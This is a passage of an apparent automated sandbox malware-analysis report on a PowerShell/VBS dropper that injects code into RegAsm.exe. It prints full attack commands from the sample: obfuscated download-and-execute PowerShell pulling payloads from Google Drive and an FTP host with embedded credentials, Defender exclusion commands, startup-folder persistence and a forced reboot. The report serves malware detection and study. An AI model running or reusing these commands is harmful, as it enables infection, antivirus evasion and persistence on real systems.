                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,20_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,20_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,20_2_00407CD2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: powershell.exe, 00000004.00000002.3091395581.000001BDC851B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                    Source: powershell.exe, 0000000D.00000002.2786504966.000001EB6578E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,20_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00443355 mov eax, dword ptr fs:[00000030h]20_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004120B2 GetProcessHeap,HeapFree,20_2_004120B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0043BB71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00434BD8 SetUnhandledExceptionFilter,20_2_00434BD8

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara match File source: amsi64_6764.amsi.csv, type: OTHER
                    Source: Yara match File source: Process Memory Space: powershell.exe PID: 1600, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: powershell.exe PID: 6764, type: MEMORYSTR
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C29008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BE6008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 608008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 20_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_00419662 mouse_event,20_2_00419662
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + 
'' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [ch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$qkkzc = 'owb9' + [char]65 + 'ds' + [char]65 + 'kq' + [char]65 + 'g' + [char]65 + 'ck' + [char]65 + 'i' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'eq' + [char]65 + 'r' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'eq' + [char]65 + 'jw' + [char]65 + 'g' + [char]65 + 'cw' + [char]65 + 'i' + [char]65 + 'by' + [char]65 + 'f' + [char]65 + '' + [char]65 + 'vqb1' + [char]65 + 'gg' + [char]65 + 'j' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'cw' + [char]65 + 'i' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'gg' + [char]65 + 'd' + [char]65 + 'b0' + [char]65 + 'h' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'c8' + [char]65 + 'lwb3' + [char]65 + 'hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'gc' + [char]65 + 'cgbh' + [char]65 + 'hq' + [char]65 + 'aqb0' + [char]65 + 'hu' + [char]65 + 'z' + [char]65 + 'bl' + [char]65 + 'hm' + [char]65 + 'zqbl' + [char]65 + 'gs' + [char]65 + 'zqby' + [char]65 + 'hm' + [char]65 + 'lgbj' + [char]65 + 'g8' + [char]65 + 'bq' + [char]65 + 'v' + [char]65 + 'hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'gk' + [char]65 + 'bgbj' + [char]65 + 'gw' + [char]65 + 'dqbk' + [char]65 + 'gu' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'gm' + [char]65 + 'dqbz' + [char]65 + 'hq' + [char]65 + 'bwbt' + [char]65 + 'gk' + [char]65 + 'egbl' + [char]65 + 'c8' + [char]65 + 'ywbz' + [char]65 + 'hm' + [char]65 + 'lwbi' + [char]65 + 'gq' + [char]65 + 'lgb0' + [char]65 + 'hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'k' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'f0' + [char]65 + 'xqbb' + [char]65 + 'hq' + [char]65 + 'ywbl' + [char]65 + 'go' + [char]65 + 'ygbv' + [char]65 + 'fs' + [char]65 + 'i' + [char]65 + '' + [char]65 + 's' + [char]65 + 'c' + [char]65 + 
'' + [char]65 + 'b' + [char]65 + 'bs' + [char]65 + 'hu' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'bl' + [char]65 + 'gs' + [char]65 + 'bwb2' + [char]65 + 'g4' + [char]65 + 'sq' + [char]65 + 'u' + [char]65 + 'ck' + [char]65 + 'i' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'ek' + [char]65 + 'vgbg' + [char]65 + 'hi' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'bk' + [char]65 + 'g8' + [char]65 + 'a' + [char]65 + 'b0' + [char]65 + 'gu' + [char]65 + 'tqb0' + [char]65 + 'gu' + [char]65 + 'rw' + [char]65 + 'u' + [char]65 + 'ck' + [char]65 + 'jw' + [char]65 + 'x' + [char]65 + 'hm' + [char]65 + 'cwbh' + [char]65 + 'gw' + [char]65 + 'qw' + [char]65 + 'u' + [char]65 + 'dm' + [char]65 + 'eqby' + [char]65 + 'ge' + [char]65 + 'cgbi' + [char]65 + 'gk' + [char]65 + 't' + [char]65 + 'bz' + [char]65 + 'hm' + [char]65 + 'yqbs' + [char]65 + 'em' + [char]65 + 'jw' + [char]65 + 'o' + [char]65 + 'gu' + [char]65 + 'c' + [char]65 + 'b5' + [char]65 + 'fq' + [ch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $jwral = $host.version.major.equals(2) ;if ( $jwral ) {$uvhrt = [system.io.path]::gettemppath();del ( $uvhrt + '\upwin.msu' );$faqoi = 'https://drive.google.com/uc?export=download&id=';$jwemr = $env:processor_architecture.contains('64') ;if ( $jwemr ) {$faqoi = ($faqoi + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$faqoi = ($faqoi + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$yfepp = (new-object net.webclient);$yfepp.encoding = [system.text.encoding]::utf8;$yfepp.downloadfile($urlkb, $uvhrt + '\upwin.msu');$mynkz = ('c:\users\' + [environment]::username );riwcg = ($uvhrt + '\upwin.msu'); powershell.exe wusa.exe riwcg /quiet /norestart ; copy-item 'c:\users\user\desktop\skmbt_77122012816310td0128_17311_xls.vbs' -destination ( $mynkz + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$mjdqf = (new-object net.webclient);$mjdqf.encoding = [system.text.encoding]::utf8;$mjdqf.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578jp@@');$lbczsg = $mjdqf.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$mjdqf.dispose();$mjdqf = (new-object net.webclient);$mjdqf.encoding = [system.text.encoding]::utf8;$lbczsg = $mjdqf.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\skmbt_77122012816310td0128_17311_xls.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' 
, 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huupx , 'd dd' ) );};"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$qkkzc = 'owb9' + [char]65 + 'ds' + [char]65 + 'kq' + [char]65 + 'g' + [char]65 + 'ck' + [char]65 + 'i' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'eq' + [char]65 + 'r' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'eq' + [char]65 + 'jw' + [char]65 + 'g' + [char]65 + 'cw' + [char]65 + 'i' + [char]65 + 'by' + [char]65 + 'f' + [char]65 + '' + [char]65 + 'vqb1' + [char]65 + 'gg' + [char]65 + 'j' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'cw' + [char]65 + 'i' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'gg' + [char]65 + 'd' + [char]65 + 'b0' + [char]65 + 'h' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'c8' + [char]65 + 'lwb3' + [char]65 + 'hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'gc' + [char]65 + 'cgbh' + [char]65 + 'hq' + [char]65 + 'aqb0' + [char]65 + 'hu' + [char]65 + 'z' + [char]65 + 'bl' + [char]65 + 'hm' + [char]65 + 'zqbl' + [char]65 + 'gs' + [char]65 + 'zqby' + [char]65 + 'hm' + [char]65 + 'lgbj' + [char]65 + 'g8' + [char]65 + 'bq' + [char]65 + 'v' + [char]65 + 'hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'gk' + [char]65 + 'bgbj' + [char]65 + 'gw' + [char]65 + 'dqbk' + [char]65 + 'gu' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'gm' + [char]65 + 'dqbz' + [char]65 + 'hq' + [char]65 + 'bwbt' + [char]65 + 'gk' + [char]65 + 'egbl' + [char]65 + 'c8' + [char]65 + 'ywbz' + [char]65 + 'hm' + [char]65 + 'lwbi' + [char]65 + 'gq' + [char]65 + 'lgb0' + [char]65 + 'hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'k' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'f0' + [char]65 + 'xqbb' + [char]65 + 'hq' + [char]65 + 'ywbl' + [char]65 + 'go' + [char]65 + 'ygbv' + [char]65 + 'fs' + [char]65 + 'i' + [char]65 + '' + [char]65 + 's' + [char]65 + 'c' + [char]65 + 
